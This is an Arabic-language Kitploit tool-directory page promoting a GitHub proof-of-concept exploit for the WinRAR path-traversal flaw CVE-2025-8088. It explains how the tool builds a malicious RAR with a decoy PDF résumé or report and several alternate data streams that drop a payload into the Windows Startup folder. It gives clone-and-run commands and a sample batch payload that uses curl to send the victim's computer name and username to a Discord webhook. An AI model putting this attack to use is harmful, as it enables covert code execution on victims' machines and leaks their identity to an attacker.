Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
best-CVE-2025-8088 — استغلال ثغرة CVE في Winrar قبل الإصدار 7.13 باستخدام تدفقات ADS متعددة على ملف واحد (تنفيذ PDF مخصص) | Kitploit
أدوات/GitHubGitHub/pentestfunctions/best-cve-2025-8088
تحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولاتاستغلال الملفات الثنائية
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

استغلال ثغرة CVE في Winrar قبل الإصدار 7.13 باستخدام تدفقات ADS متعددة على ملف واحد (تنفيذ PDF مخصص)

عرض المستودع
115منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8088 WinRAR Exploit 🔓

استغلال لإثبات المفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 والإصدارات الأقدم. تنشئ هذه الأداة أرشيف RAR خبيثًا يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

  • المشكلة في الكثير من الأدوات الأخرى أنها لا تدمج تدفقات ADS متعددة، مما يتطلب إما الحظ في وجود مسار اجتياز صحيح أو معرفة اسم المستخدم/مجلد الاستخراج بالضبط.

🚀 كيف يعمل

  1. إنشاء مستند خادع 📄 - يولّد ملف PDF بمظهر احترافي (سيرة ذاتية أو تقرير اختبار اختراق)
  2. تضمين تدفقات ADS متعددة 🔄 - يرفق تدفقات الحمولة بأعماق اجتياز مسار مختلفة
  3. التلاعب برؤوس RAR ⚙️ - يعدّل بنية الأرشيف لاستغلال ثغرة اجتياز المسار
  4. إسقاط الحمولة في بدء التشغيل 📂 - يحاول كتابة الحمولة إلى مجلد بدء تشغيل Windows عند الاستخراج

🛠️ الاستخدام

# استنساخ المستودع
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# تثبيت التبعيات
pip install reportlab

# تشغيل الاستغلال
python CVE-2025-8088.py

✏️ تخصيص الحمولة

عدّل الحمولة لاستدعاء خطاف Discord:

# استبدل المتغير PAYLOAD في السكربت:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

استبدل YOUR_DISCORD_WEBHOOK_URL برابط الخطاف الفعلي الخاص بك.

🔄 تسلسل التنفيذ

  1. الضحية يستخرج ملف RAR باستخدام WinRAR الثغرة (≤7.12)
  2. تتم كتابة الحمولة في مجلد بدء التشغيل:
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. عند إعادة التشغيل التالية ➡️ يتم تنفيذ الحمولة تلقائيًا

📋 المتطلبات

  • نظام Windows 🪟
  • Python 3.x 🐍
  • تثبيت WinRAR
  • مكتبة ReportLab (pip install reportlab)
تنزيل الأداة